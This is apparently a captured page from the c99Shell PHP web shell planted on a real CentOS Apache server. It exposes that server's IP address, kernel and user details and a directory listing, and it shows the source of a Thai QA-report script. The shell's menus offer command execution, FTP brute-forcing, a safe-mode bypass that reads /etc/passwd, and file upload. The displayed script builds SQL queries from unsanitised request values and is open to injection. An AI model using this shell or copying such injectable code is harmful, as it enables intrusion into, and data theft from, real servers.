110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/QA/ drwxr-xr-x Free 52.63 GB of 127.8 GB (41.18%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/manage/QA/ drwxr-xr-x
Free 52.63 GB of 127.8 GB (41.18%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: qaFile.php (6.44 KB) -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

<?php
session_start();
	
	/**  Define Validate Access  */
	define( '_VALID_ACCESS', 1 );

	/**  Check Session User Login  */
	if( !session_is_registered("valid_user") && !session_is_registered("Priority") ) {
		echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-874\" />";
		echo "<p style=padding-top:115px><p align=center><br /><font color=red><strong>ЎГШіТ·УЎТГ Login ЎиН№</strong></font></p></p>";
		echo "<meta http-equiv=\"refresh\" content=\"1; URL=../login.php\" />";
		exit();
	} 
	else {
	
	/**  Configuration  */
	include( "../configuration.php" );
	require_once( $_Config_absolute_path . "/includes/framework.php" );

	/**  Create Database Object  */
	$dbObj = new DBConn;
		
	/**  Config Table for This Page  */
	$myTable = "qa_qareport_tb";
	$myTableFK = "code"; 
	$myTable1 = "qa_pi_cri_tb";
	 
	/**  Query аѕЧиНЛТ Numrows ЎиН№  */
	$query = " SELECT *  FROM $myTable1   WHERE  code='$code' ";
	$result = $dbObj->execQuery($query);
	$rss = $dbObj->fetchArray($result);
	
	/**  Paging */
	$page = $_GET['page'];
	if( $page == "" ) { $page = 1; }
		
	/**  ЁУ№З№ўйНБЩЕ µиН 1 Л№йТ  */
	$perpage = $_REQUEST['perpage'];
	if( $perpage == "" ) { $perpage = 20; } 
	
	/**  вїЕаґНГмдїЕмаНЎКТГ */
	$doc_path = $_Config_live_site."/Qa_pic";
		} # else
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874" />
<title><?=$_Config_sitename;?> - ўйНБЩЕЎТГ»ГРЎС№¤ШіАТѕ</title>
<script type="text/javascript" src="../js/utilities.js"></script>

<link href="../css/default.css" rel="stylesheet" type="text/css" />
<style type="text/css">
<!--
.style22 {font-size: 14px; font-weight: bold; }
.style20 {font-size: 14px}
-->
</style>
<script type="text/JavaScript">
<!--
function MM_openBrWindow(theURL,winName,features) { //v2.0
  window.open(theURL,winName,features);
}
//-->
</script>
</head>

<body topmargin="0" rightmargin="0" bottommargin="0" leftmargin="0">
<table width="726" border="0" cellspacing="0" cellpadding="0">
  <tr>
    <td width="706" align="center" valign="top" style="padding:10px 0px 5px 10px">
    <?php
		/**  Config Paging  */
		$limit = 50;
		$scroll = $_Config_scroll; 
		
		/**  µСй§¤иТ Default КУЛГСєЎТГ·У Order By  */
		if( $OrderBy == "" ) { $OrderBy = $myTableFK; }
						
		if( !isset($_GET['ASCDESC']) ) { $ASCDESC = "ASC"; }
						
		if( $_GET['ASCDESC'] == "DESC" ) { $ASCDESC = "ASC"; }
		elseif( $_GET['ASCDESC'] == "ASC" ) { $ASCDESC = "DESC"; } 
		
		/**  Query аѕЧиНЛТ Numrows ЎиН№  */
		$query = " SELECT *  FROM $myTable  WHERE code='$code'  ";
		$result = $dbObj->execQuery($query);
		$numrows = $dbObj->_numrows;
		
		/**  Paging  */
		$display = ( !isset ($_GET['page']) ) ? 1 : $_GET['page'];
		$start = ( ($display * $limit) - $limit );
		/**  Paging  */
	
		if( isset($_GET['OrderBy']) ) {
			$query = " SELECT *  FROM $myTable  WHERE code='$code'   ORDER BY  $OrderBy $ASCDESC ";
		} 
		elseif( !isset($_GET['OrderBy']) ) {
			$query = " SELECT *  FROM $myTable  WHERE code='$code'  ORDER BY $myTableFK ASC ";
		}
		
		$query .= " LIMIT $start, $limit ";
		$result = $dbObj->execQuery($query);
    ?>
   
     <table width="705" border="0" cellspacing="0" cellpadding="0">
      <tr>
        <td width="675" height="5"></td>
      </tr>
      <tr>
        <td><font color="#000000" face="Tahoma"><strong><span class="style20">
          <input name="Stand_code" type="hidden" id="Stand_code" value="<?php echo $rss['Stand_code']; ?>" />
        </span></strong></font></td>
      </tr>
      <tr>
        <td align="center" valign="top"><table width="99%" border="0" align="center" cellpadding="1" cellspacing="1" bgcolor="#FFFFFF" style="background-color:#eeeeee; border:0px solid gray">
          	<tr bgcolor="#F0F0F0">
          	  	<td height="25" colspan="4" align="left" bordercolor="#999966" bgcolor="#FFFFFF" class="PADDING-LEFT-10"><font size="2" face="Tahoma" ><a href="javascript:;" onclick="NewWindow('AddReport.php?code=<?php echo $rss['code']; ?>','Detail','650','250')"> <img src="../picture/new.gif" alt="аѕФиБГТВЎТГаНЎКТГ" width="16" height="16" border="0" /> </a></font><font color="#000000"><span class="style22">аѕФиБГТВЎТГаНЎКТГ</span></font></td>
       	  	  </tr>
          	<?php
				$no = 1+($display-1)*$limit;
				while( $rs = $dbObj->fetchArray($result) ) { 
					$bgColor = ( $bgColor == "#FFFFFF" ) ? "#F9FBFB" : "#FFFFFF";
          	?>
          	<tr bgcolor="<?=$bgColor;?>">
          	  <td width="4%" height="20" align="right"><img src="../images/icons/linesub.gif" width="16" height="16" border="0" align="absmiddle" /></td>
          	  <td width="88%" align="left" class="PADDING-LEFT-5"><a href="download.php?filename=<?=$rs["Filename"]?>&path=qa" target="_parent">
          	    <?php if( $rs['Filename'] != "" ) echo $Filename; else echo "&nbsp;"; ?>
          	    <?=$rs["Report_name"];?>
          	  </a></td>
          	  <td width="4%" align="left" class="PADDING-LEFT-5"><font size="2" face="Tahoma"><a href="javascript:;" onclick="NewWindow('frmReport.php?ReportqaId=<? echo $rs[ReportqaId]?>','Detail','650','250','yes');"><img src="../picture/edit.gif" alt="бЎйдў" width="16" height="16" border="0" title="бЎйдўаНЎКТГ <?=$rs["Report_name"];?>"/></a></font></td>
          	  <td width="4%" align="left" class="PADDING-LEFT-5"><div align="center"><strong><font size="2" face="Tahoma">
				<!-- <a href="DelReport.php?ReportqaId=<?=$rs[ReportqaId];?>"> --> <a href="StandardDetail.php?code=<?=$_REQUEST["code"];?>&Stand_code=<?=$_REQUEST["Stand_code"];?>&codeId=<?=$_REQUEST["codeId"];?>&ReportqaId=<?=$rs["ReportqaId"];?>&action=delete"> <img src="../picture/deletenew.gif" width="16" height="16" align="absmiddle" border="0" title="ЕєаНЎКТГ <?=$rs["Report_name"];?>" onclick="return confirm('·иТ№µйН§ЎТГЕєаНЎКТГ <?=$rs["Report_name"];?> гЄиЛГЧНдБи?')" alt="ЕєўйНБЩЕ" /></a> </font></strong></div>
			  </td>
          	</tr>
          	<?php
					//$no++;
				} # while
          	?>
          	<tr>
          	  <td height="22" colspan="4" align="center" bgcolor="#F8F8F8"><strong>·Сй§ЛБґ <span class="NOTE"><?php echo $numrows; ?></span> ГТВЎТГ</strong></td>
          	</tr>
      </table></td>
      </tr>
      <tr>
        <td>&nbsp;</td>
      </tr>
    </table>
   </td>
  </tr>
</table>
</body>
</html>
<?php
	
?>

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0054 ]--